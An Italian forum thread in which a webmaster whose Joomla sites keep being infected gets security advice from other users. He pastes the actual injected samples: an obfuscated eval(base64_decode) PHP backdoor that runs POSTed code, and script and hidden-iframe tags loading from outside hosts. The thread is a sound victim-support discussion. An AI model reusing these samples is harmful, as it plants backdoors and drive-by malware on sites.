files malevoli e attacchi - consigli e accorgimenti per la sicurezza di joomla

[gippy88]

è successo a voi?
come avete risolto e se avete risolto definitivamente?

[peterrey]

magari conviene dare qualche informazioni ,tipo cosa è successo , che joomla utilizzi ecc...

[gippy88]

joomla 1.5.15 il 50% dei miei siti è stato attaccato.
anche su mantainer diversi.

è successo solo a me?

[vamba]

Scusa ma le risposte le leggi? 
Fornendo la natura del problema, raccontando cosa accade e il tipo di attacco, dando informazioni sulla release di Joomla utilizzata e altre info....

è probabile che uno ti possa dare una possibile replica
ma se è solo una semplice risposta che vuoi alla domanda

è successo solo a me?

Rispondo NO, ma non credo che ti serva a granchè! 

[gippy88]

vorrei capire se ciò che è accaduto è una mia mancanza un mio errore o capita a più di uno e quindi e una falla di joomla.

mi sembra strano che il 50% dei miei siti (circa 15) siano stati attaccati..

joomla è aggiornato alla ultima versione quindi non riesco proprio a spiegarmi il perchè.

per quanto riguarda gli attacchi sono piccoli script nascosti tra i file di joomla o file nelle cartelle.

malware

e siccome vengono rilevati da google ti viene mostrata una pagina di avviso quando accedi al sito dove ti segnala che il sito è malevolo e ti consiglia di allontanarti...

leggendo in giro sembra che nessuna abbia questi problemi di frequente, quindi oramai penso che sia una mia poca attenzione a riguardo, proverò a rileggermi qualche guida che parla di sicurezza.

[peterrey]

un'altra domanda come username del superadmin usi quella di defout ?
i siti sono su un'unico server ?

[gippy88]

si, uso admin, sarebbe meglio non utilizzarlo??

non sono sullo stesso server, si trovano anche su mantainer diversi.

Comunque stamattina mi sono svegliato con altri 2 siti infettati!!

[gippy88]

mi è stato consigliato di selezionare la spunta in fase di installazione "utilizzare ftp per aggiornare e installare nuovi componenti".
potrebbe essere importante per la sicurezza dei siti??

[peterrey]

uso admin, sarebbe meglio non utilizzarlo??

molto meglio cambiare.
Altra domanda usi un unico pc solitamente ? hai fato una scansione ?
vedi questo plugin plgSystemJSecure , cambia l'indirizzo alla pagina di admin

[gippy88]

se con scansione intendi scansione del pc.
uso linux però faccio la scansione dei siti con avira

[gippy88]

ho eliminato l'utente admin.

ora se vado in /administrator non mi fa accedere .

http://www.lineasoftsrl.it/administrator/

[peterrey]

ho eliminato l'utente admin.

eliminato ? nooooooo
dovevi rinominarlo
p.s. hai un'altro utente superadmin  o un backup spero

[gippy88]

si ovviamente ho un'altro utente super admin.
il proble e che la pagina di login administrator è cambiata...

[gippy88]

dal database nella tabella jos_user ho ridato i permessi superadmin all'utente admin, ma nulla.
come mai è cambiata la pagina di accesso al pannello admin-?

[peterrey]

il proble e che la pagina di login administrator è cambiata...

hai utilizato il plugin plgSystemJSecure ,avrai impostato la parola chiave ora per vedere l'admin dovrai srivere :
http://www.nomesito.xx/administrator/?parolachiave

[peterrey]

ecco l spiegazione , che suppongo non hai letto  , la parola quindi sarà quella di defout
http://www.joomla.it/articoli-della-community/2863-nascondere-laccesso-alla-pagina-di-login-per-il-back-end.html

[gippy88]

non dipendeva da jsecure, era collegato all'ip dell'utente.
in pratica ero administrator mi sono cambiato la user name e non mi faceva accedere per quello, l'ho capito accedendo da un'altra postazione.

cmq mi sono attrezato con jsecure, joomlapack, eyesite_joomla.

ho rinominato l'utente admin.

ho abilitato il caricamento da ftp. cosi che ogni operazione che si fa da backend chiede utente e passowrd di accesso ftp.

sperando di almeno riuscire a bloccare in tempo questi fastidiosi attacchi.

spero che questio accorgimenti bastino.
se ne avete degl altri da consigliare, tutto è bene accetto.

[peterrey]

joomlapack

è un ottimo componente ,ma ricorda due buone norme che uso sono
1 cambiare la cartella dove risiedono i backup di joomlapack
2 evitare di lasciare i backup sul server

[gippy88]

io non ci posso credere, ho ricaricato tutti i siti, dopo 1 giorno, vado su di uno di questi e trovo un errore, controllo il configuration.php e l'index.php e stanno infognati di script malevoli.

ma come cavolo è possibile?

mah proverò a scrivere sul forum di joomla.org non ci credo che nn sono mai successe a nessune ste cose, e mi sembra strano che joomla abbia queste voragini di sicurezza

[gippy88]

ecco dopo un giorno cosa c'era nel mio configuration

<?php eval(base64_decode('aWYoIWZ1bmN0aW9uX2V4aXN0cygncjQ4Jykpe2Z 1bmN0aW9uIHI0OCgkcyl7aWYocHJlZ19tYXRjaF 9hbGwoJyM8c2NyaXB0KC4qPyk8L3NjcmlwdD4ja XMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdYXMkdilp Zihjb3VudChleHBsb2RlKCJcbiIsJHYpKT41KXs kZT1wcmVnX21hdGNoKCcjW1wnIl1bXlxzXCciXC 4sO1w/IVxbXF06Lzw+XChcKV17MzAsfSMnLCR2KXx8cHJlZ19tYXRjaCgnI1tcKFxbXShccypcZCssKXsyMCx9IycsJHYpO2lmKChwcmVnX21hdGNoKCcjXGJldmFsXGIjJywkdikmJigkZXx8c3RycG9zKCR2LCdmcm9tQ2hhckNvZGUnKSkpfHwoJGUmJnN0cnBvcygkdiwnZG9jdW1lbnQud3JpdGUnKSkpJHM9c3RyX3JlcGxhY2UoJHYsJycsJHMpO31pZihwcmVnX21hdGNoX2FsbCgnIzxpZnJhbWUgKFtePl0qPylzcmM9W1wnIl0/KGh0dHA6KT8vLyhbXj5dKj8pPiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF1hcyR2KWlmKHByZWdfbWF0Y2goJyNbXC4gXXdpZHRoXHMqPVxzKltcJyJdPzAqWzAtOV1bXCciPiBdfGRpc3BsYXlccyo6XHMqbm9uZSNpJywkdikmJiFzdHJzdHIoJHYsJz8nLic+JykpJHM9cHJlZ19yZXBsYWNlKCcjJy5wcmVnX3F1b3RlKCR2LCcjJykuJy4qPzwvaWZyYW1lPiNpcycsJycsJHMpOyRzPXN0cl9yZXBsYWNlKCRhPWJhc2U2NF9kZWNvZGUoJ1BITmpjbWx3ZENCemNtTTlhSFIwY0RvdkwyRnNjR2hoTFdaaGFISjZaWFZuY0dac1pXZGxMbVJsTDJObmFTMWlhVzR2WjJGc2JHVnlhV1V1Y0dod0lENDhMM05qY21sd2REND0nKSwnJywkcyk7aWYoc3RyaXN0cigkcywnPGJvZHknKSkkcz1wcmVnX3JlcGxhY2UoJyMoXHMqPGJvZHkpI21pJywkYS4nXDEnLCRzLDEpO2Vsc2VpZihzdHJwb3MoJHMsJzxhJykpJHM9JGEuJHM7cmV0dXJuJHM7fWZ1bmN0aW9uIHI0ODIoJGEsJGIsJGMsJGQpe2dsb2JhbCRyNDgxOyRzPWFycmF5KCk7aWYoZnVuY3Rpb25fZXhpc3RzKCRyNDgxKSljYWxsX3VzZXJfZnVuYygkcjQ4MSwkYSwkYiwkYywkZCk7Zm9yZWFjaChAb2JfZ2V0X3N0YXR1cygxKWFzJHYpaWYoKCRhPSR2WyduYW1lJ10pPT0ncjQ4JylyZXR1cm47ZWxzZWlmKCRhPT0nb2JfZ3poYW5kbGVyJylicmVhaztlbHNlJHNbXT1hcnJheSgkYT09J2RlZmF1bHQgb3V0cHV0IGhhbmRsZXInP2ZhbHNlOiRhKTtmb3IoJGk9Y291bnQoJHMpLTE7JGk+PTA7JGktLSl7JHNbJGldWzFdPW9iX2dldF9jb250ZW50cygpO29iX2VuZF9jbGVhbigpO31vYl9zdGFydCgncjQ4Jyk7Zm9yKCRpPTA7JGk8Y291bnQoJHMpOyRpKyspe29iX3N0YXJ0KCRzWyRpXVswXSk7ZWNobyAkc1skaV1bMV07fX19JHI0OGw9KCgkYT1Ac2V0X2Vycm9yX2hhbmRsZXIoJ3I0ODInKSkhPSdyNDgyJyk/JGE6MDtldmFsKGJhc2U2NF9kZWNvZGUoJF9QT1NUWydlJ10pKTs=')); ?>

[peterrey]

vedi questo post http://forum.joomla.org/viewtopic.php?f=267&t=353314

[gippy88]

anche i permessi erano ok 

[peterrey]

per il seo usi qualche componente ?
usi qualche componente che è presente su tutti i siti?

[gippy88]

no niente seo.

i componenti presenti su tutti adesso sono quelli citati prima per la sicurezza (eyesite, jsecure, joomlpack)

 

dire che sono disperato e dire poco.

devo rimettere apposto una trentina di siti, e cerchero di farli in questa nottata

[gippy88]

sto consultando il forum security di joomla.org, inizio a raccogliere info e a postarle qui.

per ora ho letto che è consigliato utilizzare il mod rewriter e il mod security.

anche se da quel che ho letto il mod security si trova dentro apache quindi e compito dell'hoster, giusto??


chi ne sa qualcosa in più?

[gippy88]

vi segnalo questo fantastico post

http://forum.joomla.org/viewtopic.php?f=432&t=391251

sto apportando le modifiche che vengono suggerite, vi faccio sapere.

spero di risolvere cosi almeno dopo settimane di nottate passate a ripristinare siti forse riusciro a dormire.

oppure mi impicco....

[foxhy]

Ciao gippy88, ho visto che hai scritto un post su:
http://forum.joomla.org/viewtopic.php?f=432&t=391251
Che riguarda la modifica del file .htaccess, ho fatto una prova in locale e ho avuto lo stesso problema "error 500".
Lunica cosa che sono riuscito a capire è che l'errore dipende dalla riga dove c'è questa istruzione:

Codice: [Seleziona]

# Block out any script that tries to set CONFIG_EXT (com_extcal2 issue)
RewriteCond %{QUERY_STRING} CONFIG_EXT([|%20|%5B).*= [NC,OR]
Eliminando questa riga tutto funziona perfettamente.
Ora la domanda è che cosa c'è che non va in questo codice?
Ci vorrebbe l'aiuto di qualche esperto....speriamo!

[gippy88]

grazie foxhy!

io invece ho brutte notizie, nonostante tutte quelle precauzioni oggi controllando un sito mi sono ritrovato tutti gli index.html (quelli che trovi in ogni cartella vuoti)

con il seguente codice..

<html><script src=http://haaijk.nl/images/index.php ></script><body bgcolor="#FFFFFF"></body></html>

oppure

<html><body bgcolor="#FFFFFF"></body></html><iframe qhdik='gpPJWim3' src='http://googie-analytics.ws/in.cgi?3 ' rybbb='Yv9nZtVg' width='0' height='0' style='display:none'></iframe>

o ancora peggio pagine e pagine piene di codice binario...

tutto ciò è molto grave, i permessi sono impostati con accuratezza cosi come descritto in quel post di joomla.org che ho citato.


come è possibile secondo voi?

ma il team di joomla è al corrente di tutto ciò?

[gippy88]

come si spiega che tutti i file index.html che si trovano in ogni cartella dopo un pò di giorni vengono TUTTI riempiti di script malevoli??

premettendo che i permessi su questi file sono 644, come è possibile??

[56francesco]

gippy88 tieni per caso un contatore di visite esterno?

[gippy88]

no, nessun componente strano, solo quelli standard, quelli che ho aggiunto io sono eyesite, joomlapack, jsecure.
ccnewsletter, l'ho disattivato momentaneamente.

joomla reservation ho visto che è tra le componenti non sicure e ho tolto anche quello.

oziogallery2 è l'unico componente aggiuntivo installato.

cmq al momento ho risolto per tutti gli altri siti, solo questo in questione è stato nuovamente attaccato.

che ne pensate?
template jaw012.

[56francesco]

eyesite,

che roba sarebbe?

[foxhy]

Secondo me entrano per vie diverse, una cosa simile mi era capitata alcuni mesi fa su alcuni siti. leggi questo post ti potrebbe aiutare a capire
http://forum.joomla.it/index.php/topic,66172.msg289508.html#msg289508

In sostanza quando qualcuno riesce ad entrare con permessi FTP, si assicura gli accessi successivi inserendo una sua porta di ingresso personalizzata. Devi controllare uno per uno tutti i file e le cartelle del tuo sito "UNA BELLA SCANSIONE PROFONDA".

[gippy88]

si per il template e moduli/componenti aggiuntivi faccio cosi, me li controllo tutti, (grazie a konqueror lo faccio molto velocemente), per il resto copio sovrascrivendo le cartelle administrator, component ecc ecc i file originali di installazione di joomla, tranne ovviamente la cartela installation, cosi mi rimette tutto apposto, poi grazie abackup etc sto risolvendo, ad oggi credo di aver risolto, almeno il 90% dei problemi che avevo prima.

per quanto riguarda quel sito che mi si era nuovamente infettato ho trovato un file .php nella cartella images che avevo caricato io nuovamente da un backup vecchio già corrotto. ora a quanto pare ho risolto definitivamente.


com_eyesite è un componente che controlla gli accessi "strani" al sito.
è consigliato anche nel forum sicurezza joomla.org

grazie ragazzi, teniamoci in contatti per ulteriori trucchetti e soluzioni.

buon lavoro

[56francesco]

per quanto riguarda quel sito che mi si era nuovamente infettato ho trovato un file .php nella cartella images che avevo caricato io nuovamente da un backup vecchio già corrotto.

[gippy88]

cioè?

[gippy88]

ragazzi un altro trucchetto.

nel caso vi troviate il sito infetto.
la prima cosa da controllare è la cartella images, dentro ci troverete un file gifimg.php ovviamente eliminatelo.

[gippy88]

quando passate tra una pagina e l'altra del backend e frontend in basso nel vostro browser potete vedere...
caricamento da "vostro sito"
se avete caricamento da qualche altro sito dovete preoccuparvi.

ho riscontrato che quasi sempre
quando esce qualcos'altro (e quindi siete nei guai)
gli altri siti che escono sono

prathams.in
aaijack.nl

entrambi i siti se visitati non permettono l'accesso. ma facendo un who.is si può notate che il propietario è http://dcd.in/ un'agenzia di webdesign.

non sarà mica il caso di fargli una visita muniti di spranghe??!!

possiamo organizzare un pullman??